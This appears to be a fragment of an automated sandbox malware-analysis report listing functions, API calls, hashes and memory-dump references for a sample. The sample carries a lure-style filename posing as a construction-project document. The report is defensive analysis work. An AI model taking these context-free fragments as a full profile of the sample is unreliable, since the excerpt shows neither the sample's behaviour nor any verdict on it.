                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileString
                                                                                                                          • String ID: A4@$Server Details
                                                                                                                          • API String ID: 1096422788-4071850762
                                                                                                                          • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                          • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                          • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                          • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                          Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • strlen.MSVCRT ref: 0040849A
                                                                                                                          • memset.MSVCRT ref: 004084D2
                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,75A8EB20,?,00000000), ref: 0040858F
                                                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,75A8EB20,?,00000000), ref: 004085BA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3110682361-0
                                                                                                                          • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                          • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                          • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                                                                                                                          • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                          Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3510742995-0
                                                                                                                          • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                          • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                          • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                          • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8